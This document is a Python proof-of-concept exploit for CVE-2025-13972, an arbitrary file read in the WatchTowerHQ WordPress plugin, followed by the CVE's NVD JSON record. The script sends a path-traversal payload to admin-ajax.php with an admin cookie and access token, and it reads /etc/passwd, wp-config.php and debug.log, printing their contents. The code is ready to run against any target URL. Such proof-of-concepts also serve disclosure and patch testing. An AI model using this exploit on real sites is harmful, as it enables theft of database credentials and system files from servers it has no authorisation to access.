CVE-2025-13972

import requests import sys # CVE-2025-13972 PoC - WatchTowerHQ Plugin Arbitrary File Read # Requires: Administrator access + valid access token TARGET_URL = "http://target-wordpress-site.com" ACCESS_TOKEN = "your_valid_access_token" ADMIN_COOKIE = "wordpress_admin_cookie_here" def read_arbitrary_file(file_path): """ Attempt to read arbitrary file via WatchTowerHQ plugin vulnerability """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" headers = { "Content-Type": "application/x-www-form-urlencoded", "X-WH-Access-Token": ACCESS_TOKEN, "Cookie": ADMIN_COOKIE } # Construct malicious payload with path traversal # File path can be: ../../../../../../../../../../../..{target_file} payload = f"action=wht_big_object_download&wht_download_big_object_origin=../../../../../../../../../../../..{file_path}" try: response = requests.post(endpoint, headers=headers, data=payload, timeout=30) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully read: {file_path}") print(f"[+] Content length: {len(response.content)} bytes") return response.content else: print(f"[-] Failed to read: {file_path}") return None except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("CVE-2025-13972 WatchTowerHQ Arbitrary File Read PoC") print("=" * 60) # Target files to read targets = [ "etc/passwd", "var/www/html/wp-config.php", "var/www/html/wp-content/debug.log" ] for target in targets: content = read_arbitrary_file(target) if content: print(f"\n[File Content Start]") print(content.decode('utf-8', errors='ignore')[:500]) print(f"[File Content End]\n")

{"cve": {"id": "CVE-2025-13972", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:45.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WatchTowerHQ plugin for WordPress is vulnerable to arbitrary file read via the 'wht_download_big_object_origin' parameter in all versions up to, and including, 3.16.0. This is due to insufficient path validation in the handle_big_object_download_request function. This makes it possible for authenticated attackers, with administrator-level access and a valid access token, to read arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/watchtowerhq/tags/3.15.0/src/Download.php#L104", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/watchtowerhq/trunk/src/Download.php#L104", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13fcbff8-8560-48ca-82df-8b620961d9c6?source=cve", "source": "[email protected]"}]}}